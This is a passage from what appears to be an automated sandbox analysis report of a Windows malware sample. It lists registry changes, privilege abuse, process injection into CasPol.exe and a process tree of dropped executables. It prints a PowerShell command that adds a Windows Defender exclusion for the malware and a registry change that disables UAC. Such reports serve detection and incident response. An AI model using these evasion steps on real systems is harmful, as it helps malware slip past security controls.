\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time" bdPw0hu74RQXo05YdiloFcXR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople reg.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-272 = "Greenwich Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-215 = "Pacific Standard Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2321 = "Sakhalin Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" bdPw0hu74RQXo05YdiloFcXR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" bdPw0hu74RQXo05YdiloFcXR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs Conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed schtasks.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-401 = "Arabic Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs schtasks.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" bdPw0hu74RQXo05YdiloFcXR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs reg.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" bdPw0hu74RQXo05YdiloFcXR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WerFault.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" bdPw0hu74RQXo05YdiloFcXR.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs schtasks.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-651 = "AUS Central Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs reg.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs Conhost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-448 = "Azerbaijan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" bdPw0hu74RQXo05YdiloFcXR.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 iNiYbTHs1Lq4Du24QcHKlJFg.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e iNiYbTHs1Lq4Du24QcHKlJFg.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e iNiYbTHs1Lq4Du24QcHKlJFg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4644 powershell.exe 4644 powershell.exe 4644 powershell.exe 660 powershell.exe 660 powershell.exe 664 powershell.exe 664 powershell.exe 664 powershell.exe 660 powershell.exe 660 powershell.exe 664 powershell.exe 5092 powershell.EXE 5092 powershell.EXE 5092 powershell.EXE 5092 powershell.EXE 2080 bdPw0hu74RQXo05YdiloFcXR.exe 2080 bdPw0hu74RQXo05YdiloFcXR.exe 3096 reg.exe 3096 reg.exe 4996 reg.exe 4996 reg.exe 2936 powershell.exe 2936 powershell.exe 4996 reg.exe 2936 powershell.exe 4996 reg.exe 2936 powershell.exe 4484 bdPw0hu74RQXo05YdiloFcXR.exe 4484 bdPw0hu74RQXo05YdiloFcXR.exe 4484 bdPw0hu74RQXo05YdiloFcXR.exe 4484 bdPw0hu74RQXo05YdiloFcXR.exe 4484 bdPw0hu74RQXo05YdiloFcXR.exe 4484 bdPw0hu74RQXo05YdiloFcXR.exe 4484 bdPw0hu74RQXo05YdiloFcXR.exe 4484 bdPw0hu74RQXo05YdiloFcXR.exe 4484 bdPw0hu74RQXo05YdiloFcXR.exe 4484 bdPw0hu74RQXo05YdiloFcXR.exe 3492 BouWt3YTgZwreWLACxTGkzJz.exe 3492 BouWt3YTgZwreWLACxTGkzJz.exe 3492 BouWt3YTgZwreWLACxTGkzJz.exe 3492 BouWt3YTgZwreWLACxTGkzJz.exe 3492 BouWt3YTgZwreWLACxTGkzJz.exe 3492 BouWt3YTgZwreWLACxTGkzJz.exe 3492 BouWt3YTgZwreWLACxTGkzJz.exe 3492 BouWt3YTgZwreWLACxTGkzJz.exe 3492 BouWt3YTgZwreWLACxTGkzJz.exe 3492 BouWt3YTgZwreWLACxTGkzJz.exe 4612 powershell.exe 4612 powershell.exe 4612 powershell.exe 2680 powershell.exe 2680 powershell.exe 4612 powershell.exe 2680 powershell.exe 2680 powershell.exe 3928 reg.exe 3928 reg.exe 3896 powershell.exe 3896 powershell.exe 3928 reg.exe 3896 powershell.exe 3928 reg.exe 3896 powershell.exe 2660 reg.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4676 CasPol.exe Token: SeDebugPrivilege 4644 powershell.exe Token: SeDebugPrivilege 660 powershell.exe Token: SeDebugPrivilege 664 powershell.exe Token: SeDebugPrivilege 5092 powershell.EXE Token: SeDebugPrivilege 2080 bdPw0hu74RQXo05YdiloFcXR.exe Token: SeImpersonatePrivilege 2080 bdPw0hu74RQXo05YdiloFcXR.exe Token: SeDebugPrivilege 3096 reg.exe Token: SeImpersonatePrivilege 3096 reg.exe Token: SeDebugPrivilege 4996 reg.exe Token: SeDebugPrivilege 2936 powershell.exe Token: SeDebugPrivilege 4612 powershell.exe Token: SeDebugPrivilege 2680 powershell.exe Token: SeDebugPrivilege 3928 reg.exe Token: SeDebugPrivilege 3896 powershell.exe Token: SeDebugPrivilege 2660 reg.exe Token: SeDebugPrivilege 2680 WerFault.exe Token: SeDebugPrivilege 2136 powershell.exe Token: SeSystemEnvironmentPrivilege 4916 csrss.exe Token: SeSecurityPrivilege 2484 sc.exe Token: SeSecurityPrivilege 2484 sc.exe Token: SeDebugPrivilege 520 schtasks.exe Token: SeDebugPrivilege 2584 Conhost.exe Token: SeDebugPrivilege 560 powershell.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4380 ModJdN8jNVnymd9XGEFiFx7U.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4252 wrote to memory of 4644 4252 bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe 73 PID 4252 wrote to memory of 4644 4252 bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe 73 PID 4252 wrote to memory of 4644 4252 bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe 73 PID 4252 wrote to memory of 4676 4252 bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe 75 PID 4252 wrote to memory of 4676 4252 bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe 75 PID 4252 wrote to memory of 4676 4252 bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe 75 PID 4252 wrote to memory of 4676 4252 bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe 75 PID 4252 wrote to memory of 4676 4252 bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe 75 PID 4252 wrote to memory of 4676 4252 bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe 75 PID 4252 wrote to memory of 4676 4252 bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe 75 PID 4252 wrote to memory of 4676 4252 bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe 75 PID 4676 wrote to memory of 3096 4676 CasPol.exe 76 PID 4676 wrote to memory of 3096 4676 CasPol.exe 76 PID 4676 wrote to memory of 3096 4676 CasPol.exe 76 PID 4676 wrote to memory of 2080 4676 CasPol.exe 77 PID 4676 wrote to memory of 2080 4676 CasPol.exe 77 PID 4676 wrote to memory of 2080 4676 CasPol.exe 77 PID 4676 wrote to memory of 3828 4676 CasPol.exe 91 PID 4676 wrote to memory of 3828 4676 CasPol.exe 91 PID 4676 wrote to memory of 3828 4676 CasPol.exe 91 PID 4676 wrote to memory of 3788 4676 CasPol.exe 83 PID 4676 wrote to memory of 3788 4676 CasPol.exe 83 PID 4676 wrote to memory of 3788 4676 CasPol.exe 83 PID 4676 wrote to memory of 212 4676 CasPol.exe 90 PID 4676 wrote to memory of 212 4676 CasPol.exe 90 PID 3788 wrote to memory of 2260 3788 iNiYbTHs1Lq4Du24QcHKlJFg.exe 84 PID 3788 wrote to memory of 2260 3788 iNiYbTHs1Lq4Du24QcHKlJFg.exe 84 PID 3788 wrote to memory of 2260 3788 iNiYbTHs1Lq4Du24QcHKlJFg.exe 84 PID 3828 wrote to memory of 4380 3828 ModJdN8jNVnymd9XGEFiFx7U.exe 88 PID 3828 wrote to memory of 4380 3828 ModJdN8jNVnymd9XGEFiFx7U.exe 88 PID 3828 wrote to memory of 4380 3828 ModJdN8jNVnymd9XGEFiFx7U.exe 88 PID 3788 wrote to memory of 316 3788 iNiYbTHs1Lq4Du24QcHKlJFg.exe 87 PID 3788 wrote to memory of 316 3788 iNiYbTHs1Lq4Du24QcHKlJFg.exe 87 PID 3788 wrote to memory of 316 3788 iNiYbTHs1Lq4Du24QcHKlJFg.exe 87 PID 3788 wrote to memory of 3980 3788 iNiYbTHs1Lq4Du24QcHKlJFg.exe 89 PID 3788 wrote to memory of 3980 3788 iNiYbTHs1Lq4Du24QcHKlJFg.exe 89 PID 3788 wrote to memory of 3980 3788 iNiYbTHs1Lq4Du24QcHKlJFg.exe 89 PID 3980 wrote to memory of 924 3980 iNiYbTHs1Lq4Du24QcHKlJFg.exe 92 PID 3980 wrote to memory of 924 3980 iNiYbTHs1Lq4Du24QcHKlJFg.exe 92 PID 3980 wrote to memory of 924 3980 iNiYbTHs1Lq4Du24QcHKlJFg.exe 92 PID 4676 wrote to memory of 2320 4676 CasPol.exe 116 PID 4676 wrote to memory of 2320 4676 CasPol.exe 116 PID 4676 wrote to memory of 2320 4676 CasPol.exe 116 PID 2320 wrote to memory of 2060 2320 7nbYV20XbAUjbnnHzTZl4oOU.exe 117 PID 2320 wrote to memory of 2060 2320 7nbYV20XbAUjbnnHzTZl4oOU.exe 117 PID 2320 wrote to memory of 2060 2320 7nbYV20XbAUjbnnHzTZl4oOU.exe 117 PID 2060 wrote to memory of 2756 2060 Install.exe 122 PID 2060 wrote to memory of 2756 2060 Install.exe 122 PID 2060 wrote to memory of 2756 2060 Install.exe 122 PID 2756 wrote to memory of 4596 2756 Install.exe 131 PID 2756 wrote to memory of 4596 2756 Install.exe 131 PID 2756 wrote to memory of 4596 2756 Install.exe 131 PID 2756 wrote to memory of 424 2756 Install.exe 130 PID 2756 wrote to memory of 424 2756 Install.exe 130 PID 2756 wrote to memory of 424 2756 Install.exe 130 PID 3096 wrote to memory of 660 3096 BouWt3YTgZwreWLACxTGkzJz.exe 141 PID 3096 wrote to memory of 660 3096 BouWt3YTgZwreWLACxTGkzJz.exe 141 PID 3096 wrote to memory of 660 3096 BouWt3YTgZwreWLACxTGkzJz.exe 141 PID 424 wrote to memory of 2636 424 forfiles.exe 139 PID 424 wrote to memory of 2636 424 forfiles.exe 139 PID 424 wrote to memory of 2636 424 forfiles.exe 139 PID 2080 wrote to memory of 664 2080 bdPw0hu74RQXo05YdiloFcXR.exe 134 PID 2080 wrote to memory of 664 2080 bdPw0hu74RQXo05YdiloFcXR.exe 134 PID 2080 wrote to memory of 664 2080 bdPw0hu74RQXo05YdiloFcXR.exe 134 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe"C:\Users\Admin\AppData\Local\Temp\bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe"1⤵
- UAC bypass
- Windows security bypass
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4252 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\bd499108bc5684a3c356097facf9783a8f2331f63d7749363bb6c739ccc9c248.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4644
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Users\Admin\Pictures\BouWt3YTgZwreWLACxTGkzJz.exe"C:\Users\Admin\Pictures\BouWt3YTgZwreWLACxTGkzJz.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 3884⤵
- Program crash
PID:2116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 3724⤵
- Program crash
PID:2100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 4044⤵
- Program crash
PID:1136
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 6244⤵
- Program crash
PID:3344
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 6004⤵
- Program crash
PID:1428
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 7164⤵
- Program crash
PID:4632
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 6804⤵
- Program crash
PID:4836
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 7604⤵
- Program crash
PID:2564
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 7684⤵
- Program crash
PID:192
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 7684⤵
- Program crash
PID:1300
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 8364⤵
- Program crash
PID:2060
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 8004⤵
- Program crash
PID:3344
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 7084⤵
- Program crash
PID:2108
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 7404⤵
- Program crash
PID:1568
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 7324⤵
- Program crash
PID:3008
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 8444⤵
- Program crash
PID:1004
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 5844⤵
- Program crash
PID:3224
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 7404⤵
- Program crash
PID:4104
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 7684⤵
- Program crash
PID:2780
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
